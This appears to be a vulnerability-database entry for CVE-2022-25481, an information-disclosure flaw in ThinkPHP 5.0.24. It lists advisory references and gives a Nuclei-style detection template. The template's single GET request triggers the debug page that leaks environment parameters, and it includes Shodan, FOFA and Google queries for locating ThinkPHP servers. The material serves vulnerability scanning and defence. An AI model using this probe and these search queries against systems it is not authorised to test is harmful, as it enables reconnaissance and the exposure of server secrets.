| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2022-25481 | 21 Mar 2022 00:15 | – | attackerkb |
| ThinkPHP security vulnerability | 20 Mar 2022 00:00 | – | cnnvd |
| CVE-2022-25481 | 20 Mar 2022 00:00 | – | cve |
| CVE-2022-25481 | 20 Mar 2022 00:00 | – | cvelist |
| Exposure of Resource to Wrong Sphere in ThinkPHP Framework | 22 Mar 2022 00:00 | – | github |
| CVE-2022-25481 | 21 Mar 2022 00:15 | – | nvd |
| GHSA-69WP-XWM7-69WM Exposure of Resource to Wrong Sphere in ThinkPHP Framework | 22 Mar 2022 00:00 | – | osv |
| Code injection | 21 Mar 2022 00:15 | – | prion |
| PT-2022-17318 | 20 Mar 2022 00:00 | – | ptsecurity |
| CVE-2022-25481 | 23 May 2025 01:01 | – | redhatcve |

```yaml
id: CVE-2022-25481

info:
  name: ThinkPHP 5.0.24 - Information Disclosure
  author: caon
  severity: high
  description: |
    ThinkPHP 5.0.24 is susceptible to information disclosure. This version was configured without the PATHINFO parameter. This can allow an attacker to access all system environment parameters from index.php, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to gain sensitive information.
  remediation: |
    Upgrade to a patched version of ThinkPHP or apply the necessary security patches.
  reference:
    - https://github.com/Lyther/VulnDiscover/blob/master/Web/ThinkPHP_InfoLeak.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25481
    - https://github.com/20142995/sectool
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-25481
    cwe-id: CWE-668
    epss-score: 0.04748
    epss-percentile: 0.90747
    cpe: cpe:2.3:a:thinkphp:thinkphp:5.0.24:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: thinkphp
    product: thinkphp
    shodan-query:
      - title:"ThinkPHP"
      - http.title:"thinkphp"
      - cpe:"cpe:2.3:a:thinkphp:thinkphp"
    fofa-query:
      - title="thinkphp"
      - header="think_lang"
    google-query: intitle:"thinkphp"
  tags: cve,cve2022,thinkphp,exposure,oss,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/index.php?s=example'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Exception"
          - "REQUEST_TIME"
          - "ThinkPHP Constants"
        condition: and

      - type: status
        status:
          - 200
          - 500
          - 404
        condition: or
# digest: 490a0046304402206b3264a6295bf2fb63fa1dcc360c44f6771470cf58c34118b26d38e345b8d3e0022037584159de19989fadb1f325ba775990a99007a6eb62574849e81598c13513fe:922c64590222798bb761d5b6d8e72950
```